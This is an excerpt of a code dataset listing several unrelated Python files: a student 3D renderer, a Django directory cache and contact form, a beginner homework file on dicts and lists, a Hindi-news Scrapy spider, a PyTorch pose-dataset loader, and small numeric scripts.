dos eixos X, Y\n # e Z, respectivamente, e cada valor do tamanho deve ser maior que zero. Para desenha\n # essa caixa você vai provavelmente querer tesselar ela em triângulos, para isso\n # encontre os vértices e defina os triângulos.\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Box : size = {0}\".format(size)) # imprime no terminal pontos\n\n x = size[0]/2\n y = size[1]/2\n z = size[2]/2\n\n p0 = [x,y,z]\n p1 = [x,y,-z]\n p2 = [x,-y,z]\n p3 = [x,-y,-z]\n p4 = [-x,y,z]\n p5 = [-x,-y,z]\n p6 = [-x,-y,-z]\n p7 = [-x,y,-z]\n \n triangleStripSet(p0+p1+p2+p3+p4+p5+p6+p7+p0+p1, [8], color)\n triangleStripSet(p2+p0+p6+p4, [4], color)\n triangleStripSet(p5+p7+p1+p3, [4], color)\n\nLARGURA = 800#300\nALTURA = 400#200\n\ndef indexedFaceSet(coord, coordIndex, colorPerVertex, color, colorIndex, texCoord, texCoordIndex, current_color, current_texture):\n \"\"\" Função usada para renderizar IndexedFaceSet. \"\"\"\n # A função indexedFaceSet é usada para desenhar malhas de triângulos. Ela funciona de\n # forma muito simular a IndexedTriangleStripSet porém com mais recursos.\n # Você receberá as coordenadas dos pontos no parâmetro cord, esses\n # pontos são uma lista de pontos x, y, e z sempre na ordem. Assim point[0] é o valor\n # da coordenada x do primeiro ponto, point[1] o valor y do primeiro ponto, point[2]\n # o valor z da coordenada z do primeiro ponto. Já point[3] é a coordenada x do\n # segundo ponto e assim por diante. No IndexedFaceSet uma lista informando\n # como conectar os vértices é informada em coordIndex, o valor -1 indica que a lista\n # acabou. A ordem de conexão será de 3 em 3 pulando um índice. Por exemplo: o\n # primeiro triângulo será com os vértices 0, 1 e 2, depois serão os vértices 1, 2 e 3,\n # depois 2, 3 e 4, e assim por diante.\n # Adicionalmente essa implementação do IndexedFace suport cores por vértices, assim\n # a se a flag colorPerVertex estiver habilidades, os vértices também possuirão cores\n # que servem para definir a cor interna dos poligonos, para isso faça um cálculo\n # baricêntrico de que cor deverá ter aquela posição. Da mesma forma se pode definir uma\n # textura para o poligono, para isso, use as coordenadas de textura e depois aplique a\n # cor da textura conforme a posição do mapeamento. Dentro da classe GPU já está\n # implementadado um método para a leitura de imagens.\n \n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"IndexedFaceSet : \")\n print('coord', coord)\n print('texCoord', texCoord)\n print('texCoordIndex', texCoordIndex)\n print('coordIndex', coordIndex)\n\n if coord:\n \n points = []\n \n for i in range(0, len(coord), 3):\n points.append([ coord[i], coord[i+1], coord[i+2] ])\n \n # print(\"\\n\\tpontos(x, y, z) = {0}, coordIndex = {1}\".format(coord, coordIndex)) # imprime no terminal\n\n if colorPerVertex:\n # print(\"\\n\\tcores(r, g, b) = {0}, colorIndex = {1}\".format(color, colorIndex)) # imprime no terminal\n color_list = []\n\n for i in range(0, len(color), 3):\n color_list.append([ color[i], color[i+1], color[i+2] ])\n\n for j in range(0, len(coordIndex), 4):\n triangleSet(points[coordIndex[j]] + points[coordIndex[j+1]] + points[coordIndex[j+2]], color_list[coordIndex[j]] + color_list[coordIndex[j+1]] + color_list[coordIndex[j+2]])\n\n if(current_texture):\n image = gpu.GPU.load_texture(current_texture[0])\n\n if texCoord:\n \n # for i in range(0, len(texCoordIndex), 4):\n # texture_list.append([\n # texCoord[texCoordIndex[i]], texCoord[texCoordIndex[i]+1],\n # texCoord[texCoordIndex[i+1]], texCoord[texCoordIndex[i+1]+1],\n # texCoord[texCoordIndex[i+2]], texCoord[texCoordIndex[i+2]+1],\n # ])\n # print('texture_list', texture_list)\n \n tex_points = []\n\n for i in range(0, len(texCoord), 2):\n tex_points.append([ texCoord[i], texCoord[i+1] ])\n\n for j in range(0, len(coordIndex), 4):\n\n texture_list = tex_points[texCoordIndex[j]] + tex_points[texCoordIndex[j+1]] + tex_points[texCoordIndex[j+2]]\n\n points_list = points[coordIndex[j]] + points[coordIndex[j+1]] + points[coordIndex[j+2]]\n print(texture_list)\n triangleSet(points_list, [], texture_list, image)\n\n # print(\"\\n\\tpontos(u, v) = {0}, texCoordIndex = {1}\".format(texCoord, texCoordIndex)) # imprime no terminal\n\n\nscreenMatrix = [\n [LARGURA/2, 0, 0, LARGURA/2],\n [ 0, -ALTURA/2, 0, ALTURA/2],\n [ 0, 0, 0, 0],\n [ 0, 0, 0, 0]\n]\n\nif __name__ == '__main__':\n\n # Valores padrão da aplicação\n width = LARGURA\n height = ALTURA\n\n x3d_file = \"exemplo9.x3d\"\n # x3d_file = \"exemplo4.x3d\"\n # x3d_file = \"exemplo3.x3d\"\n # x3d_file = \"exemplo4.x3d\"\n\n image_file = \"tela.png\"\n\n # Tratando entrada de parâmetro\n parser = argparse.ArgumentParser(add_help=False) # parser para linha de comando\n parser.add_argument(\"-i\", \"--input\", help=\"arquivo X3D de entrada\")\n parser.add_argument(\"-o\", \"--output\", help=\"arquivo 2D de saída (imagem)\")\n parser.add_argument(\"-w\", \"--width\", help=\"resolução horizonta\", type=int)\n parser.add_argument(\"-h\", \"--height\", help=\"resolução vertical\", type=int)\n parser.add_argument(\"-q\", \"--quiet\", help=\"não exibe janela de visualização\", action='store_true')\n args = parser.parse_args() # parse the arguments\n if args.input: x3d_file = args.input\n if args.output: image_file = args.output\n if args.width: width = args.width\n if args.height: height = args.height\n\n # Iniciando simulação de GPU\n gpu.GPU(width, height, image_file)\n\n # Abre arquivo X3D\n scene = x3d.X3D(x3d_file)\n scene.set_resolution(width, height)\n\n # funções que irão fazer o rendering\n x3d.X3D.render[\"Polypoint2D\"] = polypoint2D\n x3d.X3D.render[\"Polyline2D\"] = polyline2D\n x3d.X3D.render[\"TriangleSet2D\"] = triangleSet2D\n x3d.X3D.render[\"TriangleSet\"] = triangleSet\n x3d.X3D.render[\"Viewpoint\"] = viewpoint\n x3d.X3D.render[\"Transform\"] = transform\n x3d.X3D.render[\"_Transform\"] = _transform\n x3d.X3D.render[\"TriangleStripSet\"] = triangleStripSet\n x3d.X3D.render[\"IndexedTriangleStripSet\"] = indexedTriangleStripSet\n x3d.X3D.render[\"Box\"] = box\n x3d.X3D.render[\"IndexedFaceSet\"] = indexedFaceSet\n\n # Se no modo silencioso não configurar janela de visualização\n if not args.quiet:\n window = interface.Interface(width, height)\n scene.set_preview(window)\n\n scene.parse() # faz o traversal no grafo de cena\n\n # Se no modo silencioso salvar imagem e não mostrar janela de visualização\n if args.quiet:\n gpu.GPU.save_image() # Salva imagem em arquivo\n else:\n window.image_saver = gpu.GPU.save_image # pasa a função para salvar imagens\n window.preview(gpu.GPU._frame_buffer) # mostra janela de visualização\n","sub_path":"renderizador.py","file_name":"renderizador.py","file_ext":"py","file_size_in_byte":22902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"500234305","text":"import os\nimport argparse\n\n\ndef _create_default_config(args: argparse.Namespace) -> None:\n import yaml\n\n settings = {\n \"gitsource\": {\n \"url\": \"the url to the git repository\",\n \"branch\": \"master\"\n },\n \"azurebatch\": {\n \"account\": \"the batch account name\",\n \"key\": \"the batch account key\",\n \"endpoint\": \"the batch account endpoint\"\n },\n \"azurestorage\": {\n \"account\": \"the storage account name\",\n \"key\": \"the storage account key\"\n },\n \"automation\": {\n \"account\": \"the service principal for running azure cli live test\",\n \"key\": \"the service principal's password\",\n \"tenant\": \"the service principal's tenant\"\n },\n \"pools\": [\n {\n 'usage': 'usage',\n 'id': 'pool id',\n 'sku': 'batch node agent sku',\n 'image': 'publisher offer sku',\n 'vmsize': 'size',\n 'dedicated': 'number of dedicated node',\n 'low-pri': 'number of low-priority node',\n 'max-tasks': 'number of max tasks per node'\n }\n ]\n }\n\n yaml.safe_dump(settings, args.output, indent=2, encoding='utf-8', default_flow_style=False)\n\n\ndef setup(subparsers) -> None:\n parser = subparsers.add_parser('create-default', help='Create a default config file as template.')\n parser.add_argument('--output', help='The path where the default config file is saved.',\n type=argparse.FileType('w'),\n default=open(os.path.join(os.getcwd(), 'default-config.yaml'), 'w'))\n parser.set_defaults(func=_create_default_config)\n","sub_path":"miriam/create_default_config.py","file_name":"create_default_config.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"169091261","text":"import os\nimport datetime\nimport logging\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction, DatabaseError\nfrom django.conf import settings\nfrom imageadmin.models import Directory, DirEntry\nfrom imageadmin.helpers.directoryinfo import list_directory\n\ndef scan_directory(path, wip_file=None):\n \"\"\"\n Scan filesystem directory at path and update directory model in db.\n \n Sets in_progress in DirEnt if wip_file exists.\n \n Does not re-scan filesystem if time since last access is less than DIR_CACHE_TIMEOUT.\n \"\"\"\n try:\n directory = Directory.objects.get(path=path)\n if datetime.datetime.now(tz=datetime.timezone.utc) - directory.last_access_date < settings.DIR_CACHE_TIMEOUT:\n # not ready to re-scan\n logging.debug(f\"directory {path} in cache still valid\")\n return\n\n except ObjectDoesNotExist:\n directory = Directory(path=path)\n directory.save()\n \n # run scanning the directory with database lock on directory to make sure only one scan runs at a time\n with transaction.atomic():\n try:\n directory = Directory.objects.select_for_update(nowait=True).get(path=path)\n logging.debug(f\"scanning directory {path}\")\n # clear dirents\n directory.direntry_set.all().delete()\n # read filesystem directory\n for d in list_directory(path):\n full_path = os.path.join(path, d)\n if wip_file:\n in_progress = os.path.exists(os.path.join(full_path, wip_file))\n else:\n in_progress = False\n \n # create direntry linked to directory\n directory.direntry_set.create(name=d, in_progress=in_progress)\n \n # update access time\n directory.save()\n \n except DatabaseError:\n logging.debug(f\"directory {path} locked - aborting scan\")\n ","sub_path":"renamer/imageadmin/helpers/directory_cache.py","file_name":"directory_cache.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"455005918","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nclass ContactForm(forms.Form):\n\tname = forms.CharField(label=\"Your Name:\", max_length=254,\n\t\t\t\t\twidget=forms.TextInput(\n\t\t\t\t\tattrs={\n\t\t\t\t\t\t'placeholder': 'Your name',\n\t\t\t\t\t\t'class': 'form-control contact-input',\n\t\t\t\t\t}))\n\temail = forms.EmailField(label=\"Your Email:\", max_length=254,\n\t\t\t\t\twidget=forms.TextInput(\n\t\t\t\t\tattrs={\n\t\t\t\t\t\t'placeholder': 'Your email address',\n\t\t\t\t\t\t'class': 'form-control contact-input',\n\t\t\t\t\t})\n\t\t\t\t)\n\tmessage = forms.CharField(label=\"Your Message:\", max_length=2000,\n\t\t\t\t\twidget=forms.Textarea(\n\t\t\t\t\tattrs={\n\t\t\t\t\t\t'placeholder': 'Your message',\n\t\t\t\t\t\t'class': 'form-control contact-msg',\n\t\t\t\t\t\t'rows': 10,\n\t\t\t\t\t\t'cols': 50,\n\t\t\t\t\t})\n\t\t\t\t)\n\n\n\tdef clean_email(self, *args, **kwargs):\n\t\temail = self.cleaned_data.get(\"email\")\n\t\tif not \"@\" in email:\n\t\t\traise ValidationError(\"This is not a valid email address.\")\n\t\treturn email","sub_path":"invator/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"443476795","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/26 17:35\n# @Author : xxx\n# @Email : xxx@admin.com\n# @File : 09 昨日作业讲解.py\n# @Software: PyCharm\n\n\n# 1.有如下变量(tu是个元祖),请实现要求的功能\ntu = (\"alex\", [11, 22, {\"k1\": 'v1', \"k2\": [\"age\", \"name\"], \"k3\": (11,22,33)}, 44])\n# a. 讲述元祖的特性\n\n# b. 请问tu变量中的第一个元素 \"alex\" 是否可被修改?\n# 不能\n\n# c. 请问tu变量中的\"k2\"对应的值是什么类型?是否可以被修改?如果可以,请在其中添加一个元素 \"Seven\"\n# tu[1][2][\"k2\"].append(\"Seven\")\n# print(tu)\n\n# d. 请问tu变量中的\"k3\"对应的值是什么类型?是否可以被修改?如果可以,请在其中添加一个元素 \"Seven\"\n# print(tu[1][2][\"k3\"])\n# tu[1][2][\"k3\"].append(\"Seven\")\n# print(tu)\n\n# 2.字典dic,dic = {'k1': \"v1\", \"k2\": \"v2\", \"k3\": [11,22,33]}\ndic = {'k1': \"v1\", \"k2\": \"v2\", \"k3\": [11,22,33]}\n# 请循环输出所有的key\nprint(dic.keys())\n\n# 请循环输出所有的value\nfor i in dic.values():\n print(i)\n\n# c. 请循环输出所有的key和value\nfor k, v in dic.items():\n print(k, v)\n\n# d. 请在字典中添加一个键值对,\"k4\": \"v4\",输出添加后的字典\n# dic[\"k4\"] = \"v4\"\n# print(dic)\n\n# e. 请在修改字典中 \"k1\" 对应的值为 \"alex\",输出修改后的字典\n# dic[\"k1\"] = \"alex\"\n# print(dic)\n\n# f. 请在k3对应的值中追加一个元素 44,输出修改后的字典\n# 用列表的append方法\n# g. 请在k3对应的值的第 1 个位置插入个元素 18,输出修改后的字典\n# dic[\"k3\"].insert(0, 18)\n\nav_catalog = {\n \"欧美\":{\n \"www.太白.com\": [\"很多免费的,世界最大的\",\"质量一般\"],\n \"www.alex.com\": [\"很多免费的,也很大\",\"质量比yourporn高点\"],\n \"oldboy.com\": [\"多是自拍,高质量图片很多\",\"资源不多,更新慢\"],\n \"hao222.com\":[\"质量很高,真的很高\",\"全部收费,屌丝请绕过\"]\n },\n \"日韩\":{\n \"tokyo-hot\":[\"质量怎样不清楚,个人已经不喜欢日韩范了\",\"verygood\"]\n },\n \"大陆\":{\n \"1024\":[\"全部免费,真好,好人一生平安\",\"服务器在国外,慢\"]\n }\n}\n# a,给此 [\"很多免费的,世界最大的\",\"质量一般\"]列表第二个位置插入一个 元素:'量很大'。\n# b,将此 [\"质量很高,真的很高\",\"全部收费,屌丝请绕过\"]列表的 \"全部收费,屌丝请绕过\" 删除。\n# c,将此[\"质量怎样不清楚,个人已经不喜欢日韩范了\",\"verygood\"]列表的 \"verygood\"全部变成大写。\n# d,给 '大陆' 对应的字典添加一个键值对 '1048' :['一天就封了']\n# e,给 '大陆' 对应的字典添加一个键值对 \"oldboy.com\": [\"多是自拍,高质量图片很多\",\"资源不多,更新慢\"]\n# f,给此[\"全部免费,真好,好人一生平安\",\"服务器在国外,慢\"]列表的第一个元素,加上一句话:'可以爬下来'\n# print(av_catalog['大陆'])\n# dic2 = av_catalog['大陆']\n# # print(dic2['1024'])\n# old_str = dic2['1024'][0]\n# new_str = old_str + '可以爬下来'\n# dic2['1024'][0] = new_str\n# print(av_catalog)\n# av_catalog['大陆']['1024'][0] = av_catalog['大陆']['1024'][0] + '可以爬下来'\nav_catalog['大陆']['1024'][0] += '可以爬下来'\n# 4.有字符串\"k: 1|k1 :2|k2:3 |k3 :4\" 处理成字典 {'k':1,'k1':2....} (升级题)\n# s1 = \" k: 1|k1 :2|k2:3 |k3 : 4 \"\n# dic = {}\n# l1 = s1.split('|')\n# # print(l1)\n# for i in l1:\n# l = i.split(':')\n# dic[l[0].strip()] = int(l[1])\n# print(dic)\n# {'k':1,'k1':2....}\n'''\ndic['k'] = 1\ndic['k1'] = 2\nprint(dic)\n'''\n\n\n\n# 5.元素分类\n# 有如下值li= [11,22,33,44,55,66,77,88,99,90],将所有大于 66 的值保存至字典的第一个key中,将小于 66 的值保存至第二个key的值中。\n# 即: {'k1': 大于66的所有值列表, 'k2': 小于66的所有值列表}\nli= [11,22,33,44,55,66,77,88,99,90]\nnew_dict = {'k1': [], 'k2': []}\nfor i in li:\n if i > 66:\n new_dict[\"k1\"].append(i)\n elif i < 66:\n new_dict[\"k2\"].append(i)\n\n# 6.输出商品列表,用户输入序号,显示用户选中的商品\n# 商品列表:\n# goods = [{\"name\": \"电脑\", \"price\": 1999},\n# {\"name\": \"鼠标\", \"price\": 10},\n# {\"name\": \"游艇\", \"price\": 20},\n# {\"name\": \"美女\", \"price\": 998}, ]\n#\n# 要求:\n# 1:页面显示 序号 + 商品名称 + 商品价格,如:\n# 1 电脑 1999\n# 2 鼠标 10\n# …\n# 2:用户输入选择的商品序号,然后打印商品名称及商品价格\n# 3:如果用户输入的商品序号有误,则提示输入有误,并重新输入。\n# 4:用户输入Q或者q,退出程序。","sub_path":"day06/09 昨日作业讲解.py","file_name":"09 昨日作业讲解.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"333220079","text":"from crawler.spiders import BaseSpider\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup as bs\nfrom scrapy.http import Request, Response\nimport time\nimport datetime\n\n#author:詹婕妤\n\nclass AgrasamacharSpider(BaseSpider):\n name = 'agrasamachar'\n website_id = 1150 # 网站的id(必填)\n language_id = 1930 # 所用语言的id\n allowed_domains = ['www.agrasamachar.com']\n start_urls = ['https://www.agrasamachar.com/',]\n sql = { # sql配置\n 'host': '192.168.235.162',\n 'user': 'dg_admin',\n 'password': 'dg_admin',\n 'db': 'dg_crawler'\n }\n month = {'जनवरी': 1, 'फ़रवरी': 2, 'मार्च': 3, 'अप्रैल': 4, 'मई': 5, 'जून': 6, 'जुलाई': 7, 'अगस्त': 8,\n 'सितंबर': 9, 'अक्तूबर': 10, 'नवंबर': 11, 'दिसंबर': 12}\n # 这是类初始化函数,用来传时间戳参数\n \n \n \n def parse(self, response):\n soup = bs(response.text,'html.parser')\n for i in soup.find_all(class_='post-title entry-title'):\n url = i.find('a').get('href')\n yield scrapy.Request(url,callback=self.parse_news)\n if soup.find(class_='blog-pager-older-link'):\n next_url = soup.find('a',class_='blog-pager-older-link').get('href')\n pub_time1 = soup.find_all(class_='date-header')[-1].find('span').text\n pub_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",datetime.datetime(int(pub_time1.split()[-1]), self.month[pub_time1.split()[1]],int(pub_time1.split()[0])).timetuple())\n if self.time == None or Util.format_time3(pub_time) >= int(self.time):\n yield scrapy.Request(next_url,callback=self.parse)\n else:\n self.logger.info('时间截止')\n\n def parse_news(self,response):\n item = NewsItem()\n soup = bs(response.text,'html.parser')\n try:\n title = soup.find(class_='post-title entry-title').text.strip()\n images = [i.get('src') for i in soup.select('.tr-caption-container img')] if soup.select('.tr-caption-container img') else []\n body = soup.find(class_='post-body entry-content').text\n pub_time = soup.find(class_='date-header').find('span').text\n item['title'] = title\n item['images'] = images\n item['pub_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\",datetime.datetime(int(pub_time.split()[-1]), self.month[pub_time.split()[1]],int(pub_time.split()[0])).timetuple())\n item['body'] = body.replace('\\xa0','\\n').strip()\n item['abstract'] = item['body'].split('\\n')[0]\n item['category1'] = None\n item['category2'] = None\n except Exception:\n pass\n yield item\n","sub_path":"crawler/v1/agrasamachar.py","file_name":"agrasamachar.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"539051830","text":"from PIL import Image, ImageOps\nimport matplotlib.pyplot as plt\n\nimg=Image.open(r'C:\\Users\\16254\\Desktop\\最囧游戏素材\\蜡烛.png')\n# box=(100,100,500,500)\n# region=img.crop(box) #此时,region是一个新的图像对象。\nim = ImageOps.autocontrast(img, 20)\nfor i in range(100):\n for j in range(100):\n img.putpixel((i, j), (255, 255, 255))\n\n\nplt.figure(\"dog\")\nplt.imshow(img)\nplt.show()","sub_path":"picturePNGEdit.py","file_name":"picturePNGEdit.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"159336246","text":"import random\n\nfrom django.core.management import BaseCommand\nfrom account.models import Workers\n\n\nclass Command(BaseCommand):\n help = \"Create slug for all Workers model\"\n\n def handle(self, *args, **options):\n print(\"Started ................>>>>\")\n workers = Workers.objects.all()\n\n for worker in workers:\n worker.salary = random.randint(500,1500)\n worker.save()\n print(\"{}\".format(worker.slug))\n\n print(\"Complate [OK]\")\n","sub_path":"account/management/commands/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"455400073","text":"import bisect\nimport random\n\nimport torch\nimport torch.utils.data as data\n\nfrom .h36m_smpl import H36mSMPL\nfrom .hp3d import HP3D\nfrom .mscoco import Mscoco\n\ns_mpii_2_smpl_jt = [\n 6, 3, 2,\n -1, 4, 1,\n -1, 5, 0,\n -1, -1, -1,\n 8, -1, -1,\n -1,\n 13, 12,\n 14, 11,\n 15, 10,\n -1, -1\n]\ns_3dhp_2_smpl_jt = [\n 4, -1, -1,\n -1, 19, 24,\n -1, 20, 25,\n -1, -1, -1, # TODO: foot point\n 5, -1, -1,\n -1,\n 9, 14,\n 10, 15,\n 11, 16,\n -1, -1\n]\ns_coco_2_smpl_jt = [\n -1, -1, -1,\n -1, 13, 14,\n -1, 15, 16,\n -1, -1, -1,\n -1, -1, -1,\n -1,\n 5, 6,\n 7, 8,\n 9, 10,\n -1, -1\n]\n\ns_smpl24_jt_num = 24\n\n\nclass MixDataset(data.Dataset):\n CLASSES = ['person']\n EVAL_JOINTS = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10]\n\n num_joints = 24\n bbox_3d_shape = (2000, 2000, 2000)\n joints_name_17 = (\n 'Pelvis', # 0\n 'L_Hip', 'L_Knee', 'L_Ankle', # 3\n 'R_Hip', 'R_Knee', 'R_Ankle', # 6\n 'Torso', 'Neck', # 8\n 'Nose', 'Head', # 10\n 'L_Shoulder', 'L_Elbow', 'L_Wrist', # 13\n 'R_Shoulder', 'R_Elbow', 'R_Wrist', # 16\n )\n joints_name_24 = (\n 'pelvis', 'left_hip', 'right_hip', # 2\n 'spine1', 'left_knee', 'right_knee', # 5\n 'spine2', 'left_ankle', 'right_ankle', # 8\n 'spine3', 'left_foot', 'right_foot', # 11\n 'neck', 'left_collar', 'right_collar', # 14\n 'jaw', # 15\n 'left_shoulder', 'right_shoulder', # 17\n 'left_elbow', 'right_elbow', # 19\n 'left_wrist', 'right_wrist', # 21\n 'left_thumb', 'right_thumb' # 23\n )\n data_domain = set([\n 'type',\n 'target_theta',\n 'target_theta_weight',\n 'target_beta',\n 'target_smpl_weight',\n 'target_uvd_29',\n 'target_xyz_24',\n 'target_weight_24',\n 'target_weight_29',\n 'target_xyz_17',\n 'target_weight_17',\n 'trans_inv',\n 'intrinsic_param',\n 'joint_root',\n 'target_twist',\n 'target_twist_weight',\n 'depth_factor'\n ])\n\n def __init__(self,\n cfg,\n train=True):\n self._train = train\n self.heatmap_size = cfg.MODEL.HEATMAP_SIZE\n\n if train:\n self.db0 = H36mSMPL(\n cfg=cfg,\n ann_file=cfg.DATASET.SET_LIST[0].TRAIN_SET,\n train=True)\n self.db1 = Mscoco(\n cfg=cfg,\n ann_file=f'person_keypoints_{cfg.DATASET.SET_LIST[1].TRAIN_SET}.json',\n train=True)\n self.db2 = HP3D(\n cfg=cfg,\n ann_file=cfg.DATASET.SET_LIST[2].TRAIN_SET,\n train=True)\n\n self._subsets = [self.db0, self.db1, self.db2]\n self._2d_length = len(self.db1)\n self._3d_length = len(self.db0) + len(self.db2)\n else:\n self.db0 = H36mSMPL(\n cfg=cfg,\n ann_file=cfg.DATASET.SET_LIST[0].TEST_SET,\n train=train)\n\n self._subsets = [self.db0]\n\n self._subset_size = [len(item) for item in self._subsets]\n self._db0_size = len(self.db0)\n\n if train:\n self.max_db_data_num = max(self._subset_size)\n self.tot_size = 2 * max(self._subset_size)\n self.partition = [0.4, 0.5, 0.1]\n else:\n self.tot_size = self._db0_size\n self.partition = [1]\n\n self.cumulative_sizes = self.cumsum(self.partition)\n\n self.joint_pairs_24 = self.db0.joint_pairs_24\n self.joint_pairs_17 = self.db0.joint_pairs_17\n self.root_idx_17 = self.db0.root_idx_17\n self.root_idx_smpl = self.db0.root_idx_smpl\n self.evaluate_xyz_17 = self.db0.evaluate_xyz_17\n self.evaluate_uvd_24 = self.db0.evaluate_uvd_24\n self.evaluate_xyz_24 = self.db0.evaluate_xyz_24\n\n @staticmethod\n def cumsum(sequence):\n r, s = [], 0\n for e in sequence:\n r.append(e + s)\n s += e\n return r\n\n def __len__(self):\n return self.tot_size\n\n def __getitem__(self, idx):\n assert idx >= 0\n if self._train:\n p = random.uniform(0, 1)\n\n dataset_idx = bisect.bisect_right(self.cumulative_sizes, p)\n\n _db_len = self._subset_size[dataset_idx]\n\n # last batch: random sampling\n if idx >= _db_len * (self.tot_size // _db_len):\n sample_idx = random.randint(0, _db_len - 1)\n else: # before last batch: use modular\n sample_idx = idx % _db_len\n else:\n dataset_idx = 0\n sample_idx = idx\n\n img, target, img_id, bbox = self._subsets[dataset_idx][sample_idx]\n\n if dataset_idx > 0:\n # COCO, 3DHP\n label_jts_origin = target.pop('target')\n label_jts_mask_origin = target.pop('target_weight')\n\n label_uvd_29 = torch.zeros(29, 3)\n label_xyz_24 = torch.zeros(24, 3)\n label_uvd_29_mask = torch.zeros(29, 3)\n label_xyz_17 = torch.zeros(17, 3)\n label_xyz_17_mask = torch.zeros(17, 3)\n\n if dataset_idx == 1:\n # COCO\n assert label_jts_origin.dim() == 1 and label_jts_origin.shape[0] == 17 * 2, label_jts_origin.shape\n\n label_jts_origin = label_jts_origin.reshape(17, 2)\n label_jts_mask_origin = label_jts_mask_origin.reshape(17, 2)\n\n for i in range(s_smpl24_jt_num):\n id1 = i\n id2 = s_coco_2_smpl_jt[i]\n if id2 >= 0:\n label_uvd_29[id1, :2] = label_jts_origin[id2, :2].clone()\n label_uvd_29_mask[id1, :2] = label_jts_mask_origin[id2, :2].clone()\n elif dataset_idx == 2:\n # 3DHP\n assert label_jts_origin.dim() == 1 and label_jts_origin.shape[0] == 28 * 3, label_jts_origin.shape\n\n label_jts_origin = label_jts_origin.reshape(28, 3)\n label_jts_mask_origin = label_jts_mask_origin.reshape(28, 3)\n\n for i in range(s_smpl24_jt_num):\n id1 = i\n id2 = s_3dhp_2_smpl_jt[i]\n if id2 >= 0:\n label_uvd_29[id1, :3] = label_jts_origin[id2, :3].clone()\n label_uvd_29_mask[id1, :3] = label_jts_mask_origin[id2, :3].clone()\n\n label_uvd_29 = label_uvd_29.reshape(-1)\n label_xyz_24 = label_xyz_24.reshape(-1)\n label_uvd_24_mask = label_uvd_29_mask[:24, :].reshape(-1)\n label_uvd_29_mask = label_uvd_29_mask.reshape(-1)\n label_xyz_17 = label_xyz_17.reshape(-1)\n label_xyz_17_mask = label_xyz_17_mask.reshape(-1)\n\n target['target_uvd_29'] = label_uvd_29\n target['target_xyz_24'] = label_xyz_24\n target['target_weight_24'] = label_uvd_24_mask\n target['target_weight_29'] = label_uvd_29_mask\n target['target_xyz_17'] = label_xyz_17\n target['target_weight_17'] = label_xyz_17_mask\n target['target_theta'] = torch.zeros(24 * 4)\n target['target_beta'] = torch.zeros(10)\n target['target_smpl_weight'] = torch.zeros(1)\n target['target_theta_weight'] = torch.zeros(24 * 4)\n target['target_twist'] = torch.zeros(23, 2)\n target['target_twist_weight'] = torch.zeros(23, 2)\n else:\n assert set(target.keys()).issubset(self.data_domain), (set(target.keys()) - self.data_domain, self.data_domain - set(target.keys()),)\n target.pop('type')\n\n return img, target, img_id, bbox\n","sub_path":"hybrik/datasets/mix_dataset.py","file_name":"mix_dataset.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"332060720","text":"\"\"\"\nauthor: madplayer\ne_mail: kch9001@gmail.com\n\"\"\"\nimport numpy as np\n\ndef Integration(y, x):\n \"\"\"\n y is value list\n y = f(x)\n x[i + 1] - x[i] = const\n \"\"\"\n size = len(x)\n j = 0\n h = x[1] - x[0]\n\n if (size - 1) % 2 != 0:\n ans = np.zeros(int(size / 2)-1)\n ans_x = np.zeros(int(size / 2)-1)\n for i in range(2, size - 2, 2):\n ans[j] += h / 3 * (y[i] + 4*y[i-1] + y[i-2])\n ans[j + 1] += ans[j] \n ans_x[j] = x[i]\n j += 1\n ans[j] += 3*h/ 8 * \\\n (y[size-1] + 4*y[size-2] + 4*y[size-3] + y[size-4])\n ans_x[j] = x[size - 1]\n else:\n ans = np.zeros(int(size / 2) + 1)\n ans_x = np.zeros(int(size / 2) + 1)\n for i in range(2, size, 2):\n ans[j] += h / 3 * (y[i] + 4*y[i-1] + y[i-2])\n ans[j + 1] += ans[j] \n ans_x[j] = x[i]\n j += 1\n ans_x[j] = x[size - 1]\n ans_x[j] = x[size - 1]\n\n return ans, ans_x\n","sub_path":"Integration/Simpson_Rule.py","file_name":"Simpson_Rule.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"612566597","text":"#PROJECT EULER PROBLEM 97\r\n\r\nproduct = 2\r\n\r\nfor each in range(1,7830457):\r\n product *= 2\r\n word = str(product)\r\n if len(word)> 10:\r\n word = word[-10:]\r\n product = int(word)\r\n\r\nproduct = product *28433 + 1\r\n\r\ntemp = str(product)\r\nprint(temp[-10:])\r\n","sub_path":"97.py","file_name":"97.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"145154954","text":"from random import randint\n\ndado1=(randint (0,6))\ndado2=(randint (0,6))\ndado3=(randint (0,6))\ndados=dado1 + dado2+ 